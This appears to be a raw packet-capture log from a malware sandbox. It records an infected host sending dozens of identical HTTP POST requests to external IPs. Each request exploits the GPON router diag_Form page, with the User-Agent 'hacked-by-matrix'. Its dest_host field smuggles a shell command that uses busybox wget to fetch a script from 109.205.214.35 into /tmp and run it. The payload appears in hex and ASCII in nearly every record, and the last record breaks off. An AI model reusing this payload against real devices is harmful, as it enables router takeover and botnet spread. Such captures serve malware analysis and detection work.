                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1471192.168.2.1354006212.84.236.161443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749922037 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1472192.168.2.1344586109.23.83.50443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749922037 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1473192.168.2.13590225.27.15.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749937057 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1474192.168.2.13597605.164.135.67443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749960899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1475192.168.2.1358844118.199.3.237443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749963999 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1476192.168.2.1334874118.143.208.197443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749969959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1477192.168.2.133386442.56.105.125443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749979973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1478192.168.2.133359242.222.5.57443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749986887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1479192.168.2.135901442.206.91.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749988079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1480192.168.2.13419325.189.12.227443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749989033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1481192.168.2.13509845.223.66.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750016928 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1482192.168.2.13513225.69.203.60443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750025988 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1483192.168.2.1335848118.210.5.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750040054 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1484192.168.2.1340912212.41.0.144443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750070095 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1485192.168.2.1341026212.13.227.120443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750092983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1486192.168.2.1334380212.197.102.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750113964 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1487192.168.2.135678842.40.165.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750124931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1488192.168.2.1338960109.240.125.239443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750147104 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1489192.168.2.133727642.132.143.4443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750153065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1490192.168.2.13571405.148.125.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750154972 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1491192.168.2.1359374118.102.108.137443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750176907 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1492192.168.2.1349660212.95.117.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750183105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1493192.168.2.13537125.11.116.80443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750199080 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
